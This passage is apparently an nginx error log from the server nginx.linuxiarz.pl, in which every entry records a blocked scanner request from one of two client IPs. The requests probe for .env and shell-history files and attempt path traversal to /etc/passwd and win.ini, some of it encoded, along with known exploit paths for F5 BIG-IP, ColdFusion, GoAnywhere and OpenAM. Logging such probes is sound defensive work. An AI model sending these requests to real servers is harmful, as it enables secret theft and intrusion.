access forbidden by rule, client: 193.41.206.50, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/05 20:41:38 [error] 3404146#3404146: *9495 access forbidden by rule, client: 193.41.206.50, server: nginx.linuxiarz.pl, request: "GET /api/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/05 20:41:45 [error] 3404146#3404146: *9498 access forbidden by rule, client: 193.41.206.50, server: nginx.linuxiarz.pl, request: "GET /.env.save HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/05 20:41:45 [error] 3404146#3404146: *9499 access forbidden by rule, client: 193.41.206.50, server: nginx.linuxiarz.pl, request: "GET /.env.prod HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/05 20:41:45 [error] 3404146#3404146: *9500 access forbidden by rule, client: 193.41.206.50, server: nginx.linuxiarz.pl, request: "GET /login/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/05 20:41:46 [error] 3404146#3404146: *9501 access forbidden by rule, client: 193.41.206.50, server: nginx.linuxiarz.pl, request: "GET /local/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/05 20:41:46 [error] 3404146#3404146: *9502 access forbidden by rule, client: 193.41.206.50, server: nginx.linuxiarz.pl, request: "GET /admin/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/05 20:41:46 [error] 3404146#3404146: *9503 access forbidden by rule, client: 193.41.206.50, server: nginx.linuxiarz.pl, request: "GET /dev/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/05 20:41:46 [error] 3404146#3404146: *9504 access forbidden by rule, client: 193.41.206.50, server: nginx.linuxiarz.pl, request: "GET /application/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 14:26:58 [error] 3404146#3404146: *38387 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 14:27:09 [error] 3404146#3404146: *38438 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 14:27:15 [error] 3404146#3404146: *38458 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 14:27:26 [error] 3404146#3404146: *38512 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /php/ztp_gate.php/.js.map HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 14:27:30 [error] 3404146#3404146: *38522 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /hax/..CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 14:27:35 [error] 3404146#3404146: *38556 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /ui/..%5Csrc%5CgetSettings.rsb?@json HTTP/1.1", host: "nginx.linuxiarz.pl", referrer: "https://nginx.linuxiarz.pl:443" +2025/03/06 14:27:38 [error] 3404146#3404146: *38561 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /npm-pwg/..;/axis2-AWC/services/listServices HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 14:27:53 [error] 3404146#3404146: *38632 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 14:27:58 [error] 3404146#3404146: *38653 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /openam/oauth2/..;/ccversion/Version HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 14:28:03 [error] 3404146#3404146: *38674 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.DS_Store HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 14:28:05 [error] 3404146#3404146: *38685 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /hex/..CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 14:28:08 [error] 3404146#3404146: *38700 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.bash_history HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 14:28:12 [error] 3404146#3404146: *38715 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.ksh_history HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 14:28:13 [error] 3404146#3404146: *38721 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.sh_history HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 14:28:13 [error] 3404146#3404146: *38723 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.zsh_history HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 14:29:54 [error] 3404146#3404146: *38821 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 14:31:09 [error] 3404146#3404146: *38890 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 14:32:00 [error] 3404146#3404146: *38932 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 14:33:06 [error] 3404146#3404146: *38984 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /php/ztp_gate.php/.js.map HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 14:33:13 [error] 3404146#3404146: *38992 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /hax/..CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 14:34:01 [error] 3404146#3404146: *39046 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /ui/..%5Csrc%5CgetSettings.rsb?@json HTTP/1.1", host: "nginx.linuxiarz.pl", referrer: "https://nginx.linuxiarz.pl:443" +2025/03/06 14:34:15 [error] 3404146#3404146: *39053 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /npm-pwg/..;/axis2-AWC/services/listServices HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 14:35:28 [error] 3404146#3404146: *39127 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.DS_Store HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 14:35:30 [error] 3404146#3404146: *39128 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 14:35:32 [error] 3404146#3404146: *39130 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /openam/oauth2/..;/ccversion/Version HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 14:35:33 [error] 3404146#3404146: *39131 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /hex/..CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 14:36:03 [error] 3404146#3404146: *39156 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.bash_history HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 14:36:33 [error] 3404146#3404146: *39182 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.ksh_history HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 14:37:03 [error] 3404146#3404146: *39207 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.sh_history HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 14:37:28 [error] 3404146#3404146: *39233 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.zsh_history HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 14:47:30 [error] 3404146#3404146: *39760 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /openam/oauth2/..;/ccversion/Version HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 14:47:52 [error] 3404146#3404146: *39774 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 14:49:30 [error] 3404146#3404146: *39826 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /custom-report-example/..%5C..%5C..%5Cdeployment%5Csharp%5Cicons%5Chome-app.png HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 14:53:03 [error] 3404146#3404146: *40013 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /npm-pwg/..;/usp/searchUsers.do HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 14:54:40 [error] 3404146#3404146: *40122 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /npm-pwg/..;/usp/searchUsers.do HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 14:56:21 [error] 3404146#3404146: *40213 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /Electron/download/windows/..%5C..%5C..%5CHttp%5Cwebroot%5Cconfig.json HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 14:56:29 [error] 3404146#3404146: *40222 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /iuap-apcom-workbench/ucf-wh/yonbiplogin/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500.png.js HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 14:57:22 [error] 3404146#3404146: *40263 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1", host: "nginx.linuxiarz.pl:443" +2025/03/06 14:59:17 [error] 3404146#3404146: *40389 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /api/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 14:59:25 [error] 3404146#3404146: *40392 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 14:59:25 [error] 3404146#3404146: *40393 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.env.bak HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 14:59:25 [error] 3404146#3404146: *40394 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.env.dev HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 14:59:26 [error] 3404146#3404146: *40395 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.env.dev.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 14:59:26 [error] 3404146#3404146: *40396 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.env.development.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 14:59:26 [error] 3404146#3404146: *40397 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.env.prod HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 14:59:26 [error] 3404146#3404146: *40398 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.env.prod.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 14:59:26 [error] 3404146#3404146: *40399 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.env.production HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 14:59:27 [error] 3404146#3404146: *40400 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.env.production.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 14:59:27 [error] 3404146#3404146: *40401 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.env.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 14:59:27 [error] 3404146#3404146: *40402 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.env.example HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 14:59:27 [error] 3404146#3404146: *40403 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.env.stage HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 14:59:27 [error] 3404146#3404146: *40404 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.env.live HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 14:59:28 [error] 3404146#3404146: *40405 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.env.backup HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 14:59:28 [error] 3404146#3404146: *40406 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.env.save HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 14:59:28 [error] 3404146#3404146: *40407 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.env.old HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 14:59:28 [error] 3404146#3404146: *40408 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.env.www HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 14:59:29 [error] 3404146#3404146: *40409 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.env_1 HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 14:59:29 [error] 3404146#3404146: *40410 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.env_sample HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 14:59:29 [error] 3404146#3404146: *40411 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.env.linuxiarz HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 14:59:29 [error] 3404146#3404146: *40412 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.env.nginx HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 15:00:06 [error] 3404146#3404146: *40432 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /..%5cetc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 15:00:06 [error] 3404146#3404146: *40433 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /..%5c..%5cetc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 15:00:06 [error] 3404146#3404146: *40434 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 15:00:06 [error] 3404146#3404146: *40435 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 15:00:06 [error] 3404146#3404146: *40436 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 15:00:06 [error] 3404146#3404146: *40437 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 15:00:06 [error] 3404146#3404146: *40438 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 15:00:06 [error] 3404146#3404146: *40439 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /static/..%5cetc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 15:00:06 [error] 3404146#3404146: *40440 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /static/..%5c..%5cetc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 15:00:06 [error] 3404146#3404146: *40441 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /static/..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 15:00:07 [error] 3404146#3404146: *40442 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /static/..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 15:00:07 [error] 3404146#3404146: *40443 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /static/..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 15:00:07 [error] 3404146#3404146: *40444 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /static/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 15:00:07 [error] 3404146#3404146: *40445 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /static/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 15:00:07 [error] 3404146#3404146: *40447 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 15:00:07 [error] 3404146#3404146: *40448 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 15:00:07 [error] 3404146#3404146: *40449 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 15:00:07 [error] 3404146#3404146: *40450 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 15:00:08 [error] 3404146#3404146: *40452 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 15:00:24 [error] 3404146#3404146: *40457 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 15:00:32 [error] 3404146#3404146: *40458 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 15:00:32 [error] 3404146#3404146: *40460 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 15:00:32 [error] 3404146#3404146: *40461 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./windows/win.ini HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 15:00:32 [error] 3404146#3404146: *40462 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2ewindows/win.ini HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 15:00:32 [error] 3404146#3404146: *40463 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win.ini HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 15:00:34 [error] 3404146#3404146: *40477 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/windows/win.ini HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 15:03:00 [error] 3404146#3404146: *40711 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.ftpconfig HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 15:03:22 [error] 3404146#3404146: *40730 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.config/sftp.json HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 15:03:52 [error] 3404146#3404146: *40772 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.vscode/sftp.json HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 15:03:56 [error] 3404146#3404146: *40775 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.drone.yml HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 15:05:03 [error] 3404146#3404146: *40840 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1", host: "nginx.linuxiarz.pl:443" +2025/03/06 15:05:15 [error] 3404146#3404146: *40845 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /npm-pwg/..;/axis2-AWC/services/listServices HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 15:06:19 [error] 3404146#3404146: *40897 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.env_sample HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 15:06:20 [error] 3404146#3404146: *40898 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 15:06:20 [error] 3404146#3404146: *40899 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.env.dev.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 15:06:20 [error] 3404146#3404146: *40900 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.env.development.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 15:06:20 [error] 3404146#3404146: *40901 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.env.prod.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 15:06:21 [error] 3404146#3404146: *40902 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.env.production.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 15:06:21 [error] 3404146#3404146: *40903 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.env.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 15:06:21 [error] 3404146#3404146: *40904 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.env.example HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 15:06:21 [error] 3404146#3404146: *40905 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.env.stage HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 15:06:21 [error] 3404146#3404146: *40911 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.env.live HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 15:06:21 [error] 3404146#3404146: *40912 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.env_1 HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 15:06:21 [error] 3404146#3404146: *40913 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.env.old HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 15:06:34 [error] 3404146#3404146: *40928 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.env.dev.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 15:06:37 [error] 3404146#3404146: *40935 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.env.development.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 15:06:38 [error] 3404146#3404146: *40936 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /api/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 15:06:39 [error] 3404146#3404146: *40937 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.env.prod HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 15:06:39 [error] 3404146#3404146: *40938 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.env.prod.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 15:06:39 [error] 3404146#3404146: *40939 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.env.production HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 15:06:39 [error] 3404146#3404146: *40940 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.env.production.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 15:06:39 [error] 3404146#3404146: *40941 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.env.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 15:06:39 [error] 3404146#3404146: *40942 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.env.example HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 15:06:39 [error] 3404146#3404146: *40943 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.env.stage HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 15:06:39 [error] 3404146#3404146: *40944 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.env.live HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 15:06:39 [error] 3404146#3404146: *40945 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.env.backup HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 15:06:39 [error] 3404146#3404146: *40946 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.env.save HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 15:06:40 [error] 3404146#3404146: *40947 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.env.old HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/06 15:06:40 [error] 3404146#3404146: *40948 access forbidden by rule, client: 195.164.49.70, server: nginx.linuxiarz.pl, request: "GET /.env.www HTTP/1.1", host: 